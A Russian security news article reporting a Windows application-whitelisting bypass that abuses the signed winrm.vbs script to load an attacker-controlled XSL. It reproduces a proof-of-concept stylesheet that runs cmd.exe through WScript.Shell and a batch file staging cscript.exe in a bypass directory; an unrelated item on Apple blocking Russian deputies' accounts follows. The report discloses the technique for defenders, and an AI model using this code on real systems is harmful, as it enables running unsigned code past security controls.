В Windows найден метод обхода белых списков приложений

Олег Иванов 16 Июля 2018 - 08:51

...

В Windows найден метод обхода белых списков приложений

Исследователь в области кибербезопасности Мэтт Гребер нашел интересный метод обхода белых списков приложений в Windows. Помимо этого, эксперт описал технику выполнения произвольного неподписанного кода в winrm.vbs.

winrm.vbs (подписанный Windows скрипт в System32) способен выполнять контролируемый злоумышленником XSL, который не попадет под ограничения «enlightened script host», в результате это приведет к выполнению произвольного неподписанного кода.

«Если вы добавляете “-format:pretty” или “ -format:text” в winrm.vbs, он вытащит WsmPty.xsl или WsmTxt.xsl из каталога, в котором находится cscript.exe. Это значит, что атакующий может скопировать cscript.exe в нужное ему место, где находится вредоносный XSL», — пишет специалист.

«Благодаря этому киберпреступник может добиться выполнения произвольного неподписанного кода. Эта техника практически идентична описанному Кейси Смитом методу с использованием wmic.exe».

Что касается Proof-of-Concept, эксперт опубликовал следующие шаги:

Поместить вредоносный файл WsmPty.xsl или WsmTxt.xsl в контролируемую атакующим директорию.
Скопировать файл cscript.exe или wscript.exe в ту же самую директорию.
Выполнить winrm.vbs с «-format», указав «pretty» (если был помещен файл WsmPty.xsl) или «text» (если был помещен файл WsmTxt.xsl).

Исследователь привел пример вредоносного XSL, который можно поместить в контролируемый злоумышленником каталог. В качестве примера эксперт помещает файл по этому пути — C:\BypassDir\WsmPty.xsl.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]> </ms:script>
</stylesheet>

Грамотное оформление вредоносного файла WsmPty.xsl должно включать использование встроенного пейлоада DotNetToJScript, приводящего к выполнению произвольного кода.

«В процессе помещения файла WsmPty.xsl можно использовать следующий пакетный файл для запуска пейлоада», — объясняет эксперт:

mkdir %SystemDrive%\BypassDir
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

Следующая главная новость »

Знай своего врага: как работает киберразведка в 2026 году?
Регистрируйтесь на эфир!

Яков Шпунт 04 Марта 2026 - 10:41

macOS iOS Общее Apple

У депутатов Госдумы начали блокировать аккаунты Apple

С блокировками аккаунтов Apple столкнулись как минимум три депутата Госдумы. По их словам, это связано с санкционной политикой США. Один из парламентариев получил блокировку при попытке оплатить подписку, другому уведомление пришло неожиданно.

О блокировке аккаунтов депутатов сообщили «Ведомости» со ссылкой на самих парламентариев.

Ранее единственным российским политиком, публично заявлявшим о такой блокировке, был Дмитрий Рогозин, ныне сенатор от Запорожской области. При этом, по его словам, техникой Apple он никогда не пользовался, а о блокировке узнал случайно, проверяя почту на почти заброшенном аккаунте.

Депутаты Роза Чемерис и Виталий Милонов, которые пользуются iPhone, утверждают, что Apple ID у них нет. Еще один депутат, как отмечает издание, смог оплатить подписку на один из сервисов на глазах у корреспондента.

Политолог Константин Калачев назвал использование депутатами смартфонов Apple проявлением двоемыслия. В то же время, по его словам, такая практика объяснима: iPhone — качественный продукт, а от привычек в целом сложно отказаться. Тем, кто столкнулся с блокировкой, он посоветовал перейти на альтернативные платформы.

Руководитель отдела разработки компании EvApps Дмитрий Ентин исключил возможность передачи данных российских депутатов операторами связи или продавцами устройств: это прямо запрещено российским законодательством. Он также допустил, что с блокировками могут столкнуться полные тезки подсанкционных лиц. При этом Ентин отметил, что ему не известны случаи реальных блокировок аккаунтов подсанкционных лиц.

Аналитик акселератора Fintech Lab Сергей Вильянов назвал блокировку аккаунтов нелогичным шагом: подобные меры, по его словам, не применялись даже в отношении представителей Ирана. Он подчеркнул, что поддержка оборудования и ПО — важное условие для спокойного возвращения на российский рынок. В качестве возможного решения Вильянов упомянул оформление аккаунтов на других людей или регистрацию в другой стране.

Знай своего врага: как работает киберразведка в 2026 году?
Регистрируйтесь на эфир!